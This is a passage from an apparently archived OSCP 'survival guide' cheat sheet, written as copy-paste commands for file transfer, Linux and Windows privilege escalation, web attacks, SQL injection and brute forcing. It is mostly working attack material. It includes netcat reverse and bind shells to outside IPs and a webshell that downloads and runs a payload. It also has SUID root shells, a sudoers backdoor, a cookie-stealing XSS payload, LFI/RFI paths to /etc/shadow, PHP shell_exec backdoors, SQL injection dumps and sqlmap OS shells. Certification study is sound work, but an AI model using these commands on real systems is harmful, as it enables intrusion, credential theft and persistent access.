{:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerabl
e\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80

File Transfers
Post exploitation refers to the actions performed by an attacker, once some
level of control has been gained on his target.

Simple Local Web Servers

Run a basic http server, great for serving up shells etc

python -m SimpleHTTPServer 80

Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server

Run a ruby webrick basic http server

ruby -rwebrick -e “WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start”

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 13/33
2025/2/21 下午4:03 x89k
Run a basic PHP http server
php -S $ip:80
Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

Windows file transfer script that can be pasted to the command line. File
transfers to a Windows machine can be tricky without a Meterpreter shell. The
following script can be copied and pasted into a basic windows reverse and
used to transfer files from a web server (the timeout 1 commands are required
after each new line):

echo Set args = Wscript.Arguments >> webdl.vbs

timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webd
l.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
>> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> we
bdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >
> webdl.vbs
timeout 1
echo end with >> webdl.vbs
timeout 1
echo

The file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

Mounting File Shares

Mount NFS share to /mnt/nfs

mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip –script http-put –script-args http-put.url=’/test/sicpwn.php’,http-
put.file=’/var/www/html/sicpwn.php

Uploading Files
SCP

scp username1@source_host:directory1/filename1
username2@destination_host:directory2/filename2

scp localfile username@$ip:~/Folder/

scp Linux_Exploit_Suggester.pl [email protected]:~

Webdav with Davtest- Some sysadmins are kind enough to enable the
PUT method - This tool will auto upload a backdoor

davtest -move -sendbd auto -url http://$ip

https://github.com/cldrn/davtest

You can also upload a file using the PUT method with the curl
command:

curl -T 'leetshellz.txt' 'http://$ip'

And rename it to an executable file using the MOVE method with the
curl command:

curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

Upload shell using limited php shell cmd

use the webshell to download and execute the meterpreter
[curl -s –data “cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil”

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 14/33
2025/2/21 下午4:03 x89k
http://$ip/files/sh.php
[curl -s –data “cmd=chmod 777 /tmp/evil” http://$ip/files/sh.php
curl -s –data “cmd=bash -c /tmp/evil” http://$ip/files/sh.php
TFTP
mkdir /tftp
atftpd –daemon –port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe

FTP
apt-get update && apt-get install pure-ftpd

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/

/etc/init.d/pure-ftpd restart

Packing Files
Ultimate Packer for eXecutables
upx -9 nc.exe

exe2bat - Converts EXE to a text file that can be copied and pasted
locate exe2bat
wine exe2bat.exe nc.exe nc.txt

Veil - Evasion Framework - https://github.com/Veil-Framework/Veil-

Evasion
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c

Privilege Escalation
Password reuse is your friend. The OSCP labs are true to life, in the way that the
users will reuse passwords across different services and even different boxes.
Maintain a list of cracked passwords and test them on new machines you encounter.

Linux Privilege Escalation

Defacto Linux Privilege Escalation Guide - A much more through guide for
linux enumeration:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-
escalation/

Try the obvious - Maybe the user is root or can sudo to root:

sudo su

Here are the commands I have learned to use to perform linux enumeration
and privledge escalation:

What users can login to this box (Do they use thier username as thier
password)?:

grep -vE "nologin|false" /etc/passwd

What kernel version are we using? Do we have any kernel exploits for this
version?

uname -a

searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"

What applications have active connections?:

netstat -tulpn

What services are running as root?:

ps aux | grep root

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 15/33
2025/2/21 下午4:03 x89k
What files run as root / SUID / GUID?:

find / -perm +2000 -user root -type f -print

find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only th
e owner of the directory or the owner of a file can delete or re
name here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) -
run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) -
run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID o
r SUID
for i in `locate -r "bin$"`; do find $i $ -perm -4000 -o -perm
-2000 $ -type f 2>/dev/null; done
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls
-ld {} \; 2>/dev/null

What folders are world writeable?:

find / -writable -type d 2>/dev/null # world-writeable fol

ders
find / -perm -222 -type d 2>/dev/null # world-writeable fol
ders
find / -perm -o w -type d 2>/dev/null # world-writeable fol
ders
find / -perm -o x -type d 2>/dev/null # world-executable fo
lders
find / $ -perm -o w -perm -o x $ -type d 2>/dev/null # worl
d-writeable & executable folders

There are a few scripts that can automate the linux enumeration process:

Google is my favorite Linux Kernel exploitation search tool. Many of

these automated checkers are missing important kernel exploits which
can create a very frustrating blindspot during your OSCP course.

LinuxPrivChecker.py - My favorite automated linux priv enumeration

checker -

https://www.securitysift.com/download/linuxprivchecker.py

LinEnum - (Recently Updated)

https://github.com/rebootuser/LinEnum

linux-exploit-suggester (Recently Updated)

https://github.com/mzet-/linux-exploit-suggester

Highon.coffee Linux Local Enum - Great enumeration script!

wget https://highon.coffee/downloads/linux-local-enum.sh

Linux Privilege Exploit Suggester (Old has not been updated in years)

https://github.com/PenturaLabs/Linux_Exploit_Suggester

Linux post exploitation enumeration and exploit checking tools

https://github.com/reider-roque/linpostexp

Handy Kernel Exploits

CVE-2010-2959 - ‘CAN BCM’ Privilege Escalation - Linux Kernel < 2.6.36-rc1

(Ubuntu 10.04 / 2.6.32)

https://www.exploit-db.com/exploits/14814/

wget -O i-can-haz-modharden.c http://www.exploit-db.com/downloa

d/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)

CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

https://www.exploit-db.com/exploits/15285/

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo /

Ubuntu x86/x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056

wget -O exploit.c http://www.exploit-db.com/download/18411

gcc -o mempodipper exploit.c

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 16/33
2025/2/21 下午4:03 x89k
./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <=

3.19.0-73.8
https://dirtycow.ninja/
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016

Run a command as a user other than root

sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-d

efault.conf

Add a user or change a password

/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor

echo thePassword | passwd haxzor --stdin

Local Privilege Escalation Exploit in Linux

SUID (Set owner User ID up on execution)

Often SUID C binary files are required to spawn a shell as a superuser,
you can update the UID / GID and shell as required.

below are some quick copy and paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c

Create and compile an SUID from a limited shell (no file transfer)

echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/

bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc

Handy command if you can get a root user to run it. Add the www-data user to
Root SUDO group with no password requirement:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /

You may find a command is being executed by the root user, you may be able
to modify the system PATH environment variable to execute your command
instead. In the example below, ssh is replaced with a reverse shell SUID
connecting to 10.10.10.1 on port 4444.

set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.
10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh

SearchSploit

searchsploit –uncsearchsploit apache 2.2

searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
searchsploit slmail

Kernel Exploit Suggestions for Kernel Version 3.0.0

./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0

Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on

the target machine!

https://www.kernel-exploits.com/

Collect root password

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 17/33
2025/2/21 下午4:03 x89k
cat /etc/shadow |grep root
Find and display the proof.txt or flag.txt - LOOT!

cat `find / -name proof.txt -print`

Windows Privilege Escalation

Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html

Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-

security.com/metasploit-unleashed/privilege-escalation/

Try the obvious - Maybe the user is SYSTEM or is already part of the
Administrator group:

whoami

net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a
try.

meterpreter > getsystem

No File Upload Required Windows Privlege Escalation Basic Information

Gathering (based on the fuzzy security tutorial and
windows_privesc_check.py).

Copy and paste the following contents into your remote Windows shell in Kali
to generate a quick report:

@echo --------- BASIC WINDOWS RECON --------- > report.txt

timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.
txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -A >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\Al
waysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\Al
waysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\"
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 18/33
2025/2/21 下午4:03 x89k
dir "C:\Program Files (x86)\"
timeout 1
dir "C:\Users\"
timeout 1
dir "C:\Users\Public\"
timeout 1
echo REPORT COMPLETE!

Windows Server 2003 and IIS 6.0 WEBDAV Exploiting

http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT

=443 -f asp > aspshell.txt

cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 byte
s succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeede
d.
dav:/> exit

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_
tcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j

curl http://$ip/aspshell3.asp;.txt

[*] Started reverse TCP handler on 1.2.3.4:443

[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 1.2.3.5
[*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063)
at 2017-09-25 13:10:55 -0700

Windows privledge escalation exploits are often written in Python. So, it is

necessary to compile the using pyinstaller.py into an executable and upload
them to the remote server.

pip install pyinstaller

wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py

Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:

https://www.exploit-db.com/exploits/6705/

https://github.com/Re4son/Churrasco

c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"

c:\Inetpub>churrasco -d "net user /add <username> <password>"

c:\Inetpub>churrasco -d "net localgroup administrators <usernam
e> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users"
<username> /ADD"

Windows MS11-080 - http://www.exploit-db.com/exploits/18176/

python pyinstaller.py --onefile ms11-080.py

mx11-080.exe -O XP

Powershell Exploits - You may find that some Windows privledge escalation
exploits are written in Powershell. You may not have an interactive shell that
allows you to enter the powershell prompt. Once the powershell script is
uploaded to the server, here is a quick one liner to run a powershell command
from a basic (cmd.exe) shell:

MS16-032 https://www.exploit-db.com/exploits/39719/

powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-

Powershell Priv Escalation Tools

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 19/33
2025/2/21 下午4:03 x89k
Windows Run As - Switching users in linux is trival with the SU command.
However, an equivalent command does not exist in Windows. Here are 3
ways to run a command as a different user in Windows.

Sysinternals psexec is a handy tool for running a command on a

remote or local server as a specific user, given you have thier
username and password. The following example creates a reverse
shell from a windows server to our Kali box using netcat for Windows
and Psexec (on a 64 bit system).

C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\p

ublic\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

PsExec v2.2 - Execute processes remotely

Runas.exe is a handy windows tool that allows you to run a program as

another user so long as you know thier password. The following
example creates a reverse shell from a windows server to our Kali box
using netcat for Windows and Runas.exe:

C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Te

st "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.ex
e"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

PowerShell can also be used to launch a process as another user. The

following simple powershell script will run a reverse shell as the
specified username and password.

$username = '<username here>'

$password = '<password here>'
$securePassword = ConvertTo-SecureString $password -AsPlai
nText -Force
$credential = New-Object System.Management.Automation.PSCr
edential $username, $securePassword
Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindo
w -Credential $credential -ArgumentList ("-nc","192.168.1.1
0","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public

Next run this script using powershell.exe:

powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }

Windows Service Configuration Viewer - Check for misconfigurations in

services that can lead to privilege escalation. You can replace the executable
with your own and have windows execute whatever code you want as the
privileged user.
icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Compile a custom add user command in windows using C

root@kali:~# cat useradd.c

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}

i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c

Group Policy Preferences (GPP)

A common useful misconfiguration found in modern domain environments is
unprotected Windows GPP settings files

map the Domain controller SYSVOL share

net use z:\\dc01\SYSVOL

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 20/33
2025/2/21 下午4:03 x89k
Find the GPP file: Groups.xml

dir /s Groups.xml
Review the contents for passwords

type Groups.xml

Decrypt using GPP Decrypt

gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
Find and display the proof.txt or flag.txt - get the loot!

#meterpreter > run post/windows/gather/win_privs

cd\ & dir /b /s proof.txt type c:\pathto\proof.txt

Client, Web and Password

Attacks
Client Attacks
MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack

echo ‘’ > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells

http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Setting up the Client Side Exploit

Swapping Out the Shellcode

Injecting a Backdoor Shell into Plink.exe

backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P
4444 -s reverse_shell_tcp

Web Attacks
Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given

password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

Java Signed Applet Attack

HTTP / HTTPS Webserver Enumeration

OWASP Dirbuster

nikto -h $ip

Essential Iceweasel Add-ons

Cookies Manager https://addons.mozilla.org/en-
US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Cross Site Scripting (XSS)

significant impacts, such as cookie stealing and authentication bypass,
redirecting the victim’s browser to a malicious HTML page, and more

Browser Redirection and IFRAME Injection

<iframe SRC="http://$ip/report" height = "0" width="0"></if

rame>

Stealing Cookies and Session Information

<javascript>
new image().src="http://$ip/bogus.php?output="+document.coo

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 21/33
2025/2/21 下午4:03 x89k
kie;
</script>

nc -nlvp 80

File Inclusion Vulnerabilities

Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly
found in poorly written PHP code.

fimap - There is a Python tool called fimap which can be leveraged to

automate the exploitation of LFI/RFI vulnerabilities that are found in
PHP (sqlmap for LFI):
https://github.com/kurobeats/fimap

Gaining a shell from phpinfo()

fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually
possible to get a shell, if you don’t know the location of the
phpinfo file fimap can probe for it, or you could use a tool like
OWASP DirBuster.
For Local File Inclusions look for the include() function in PHP code.

include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");

LFI - Encode and Decode a file using base64

curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resour
ce=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d

LFI - Download file with base 64 encoding

http://$ip/index.php?page=php://filter/convert.base64-
encode/resource=admin.php

LFI Linux Files:

/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root

LFI Windows Files:

%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt

LFI OSX Files:

/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf

LFI - Download passwords file

http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd

LFI - Download passwords file with filter evasion

http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

Local File Inclusion - In versions of PHP below 5.3 we can terminate

with null byte
GET /addguestbook.php?
name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>

For a Remote File Inclusion look for php code that is not sanitized and
passed to the PHP include function and the php.ini file must be

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 22/33
2025/2/21 下午4:03 x89k
configured to allow remote files

/etc/php5/cgi/php.ini - “allow_url_fopen” and “allow_url_include” both

set to “on”

include($_REQUEST["file"].".php");
Remote File Inclusion

http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt

<?php echo shell\_exec("ipconfig");?>

Database Vulnerabilities
Playing with SQL Syntax A great tool I have found for playing with SQL
Syntax for a variety of database types (MSSQL Server, MySql,
PostGreSql, Oracle) is SQL Fiddle:
http://sqlfiddle.com

Another site is rextester.com:

http://rextester.com/l/mysql_online_compiler

Detecting SQL Injection Vulnerabilities.

Most modern automated scanner tools use time delay techniques to

detect SQL injection vulnerabilities. This method can tell you if a SQL
injection vulnerability is present even if it is a “blind” sql injection
vulnerabilit that does not provide any data back. You know your SQL
injection is working when the server takes a LOooooong time to
respond. I have added a line comment at the end of each injection
statement just in case there is additional SQL code after the injection
point.

MSSQL Server SQL Injection Time Delay Detection: Add a 30

second delay to a MSSQL Server Query

Original Query

SELECT * FROM products WHERE name='Test';

Injection Value

'; WAITFOR DELAY '00:00:30'; --

Resulting Query

SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --

MySQL Injection Time Delay Detection: Add a 30 second

delay to a MySQL Query

Original Query

SELECT * FROM products WHERE name='Test';

Injection Value

'-SLEEP(30); #

Resulting Query

SELECT * FROM products WHERE name='Test'-SLEEP(30); #

PostGreSQL Injection Time Delay Detection: Add a 30 second

delay to an PostGreSQL Query

Original Query

SELECT * FROM products WHERE name='Test';

Injection Value

'; SELECT pg_sleep(30); --

Resulting Query

SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --

Grab password hashes from a web application mysql database called

“Users” - once you have the MySQL root username and password

mysql -u root -p -h $ip

use "Users"
show tables;
select \* from users;

Authentication Bypass

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 23/33
2025/2/21 下午4:03 x89k

name='wronguser' or 1=1;
name='wronguser' or 1=1 LIMIT 1;

Enumerating the Database

http://192.168.11.35/comment.php?id=738)'

Verbose error message?

http://$ip/comment.php?id=738 order by 1

http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6

Determine MySQL Version:

http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6

Current user being used for the database connection:

http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6

Enumerate database tables and column structures

http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schem

Target the users table in the database

http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_sche

Extract the name and password

http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM use

Create a backdoor

http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd'

SQLMap Examples

Crawl the links

sqlmap -u http://$ip --crawl=1

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 -

SQLMap Search for databases against a suspected GET SQL Injection

sqlmap –u http://$ip/blog/index.php?search –dbs

SQLMap dump tables from database oscommerce at GET SQL

injection

sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps

SQLMap GET Parameter command

sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5

SQLMap Post Username parameter

sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231"

SQL Map OS Shell

sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell

sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231"

Automated sqlmap scan

sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --curre

Targeted sqlmap scan

sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump

Scan url for union + error based injection with mysql backend and use
a random user agent + database dump

sqlmap -o -u http://$ip/index.php --forms --dbs

sqlmap -o -u "http://$ip/form/" --forms

Sqlmap check form for injection

sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump

Enumerate databases

sqlmap --dbms=mysql -u "$URL" --dbs

Enumerate tables from a specific database

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

Dump table data from a specific database and table

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 24/33
2025/2/21 下午4:03 x89k
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit

sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param

Specify parameter to exploit in ‘nice’ URIs (exploits param1)

sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs

Get OS shell

sqlmap --dbms=mysql -u "$URL" --os-shell

Get SQL shell

sqlmap --dbms=mysql -u "$URL" --sql-shell

SQL query

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

Use Tor Socks5 proxy

sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

NoSQLMap Examples You may encounter NoSQL instances like MongoDB
in your OSCP journies ( /cgi-bin/mongo/2.2.3/dbparse.py ). NoSQLMap can
help you to automate NoSQLDatabase enumeration.

NoSQLMap Installation

git clone https://github.com/codingo/NoSQLMap.git

cd NoSQLMap/
ls
pip install couchdb
pip install pbkdf2
pip install ipcalc
python nosqlmap.py

Often you can create an exception dump message with MongoDB using a
malformed NoSQLQuery such as:

a'; return this.a != 'BadData’'; var dummy='!

Password Attacks
AES Decryption
http://aesencryption.net/

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \

curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n'
>> webapp.txt ; \
done

Or convert html to word list dict

html2dic index.html.out | sort -u > index-html.dict

Default Usernames and Passwords

CIRT
http://www.cirt.net/passwords

Government Security - Default Logins and Passwords for

Networked Devices

http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.p

Virus.org
http://www.virus.org/default-password/

Default Password
http://www.defaultpassword.com/

Brute Force

Nmap Brute forcing Scripts

https://nmap.org/nsedoc/categories/brute.html

Nmap Generic auto detect brute force attack:

nmap --script brute -Pn <target.com or ip>

MySQL nmap brute force attack:

nmap --script=mysql-brute $ip

Dictionary Files

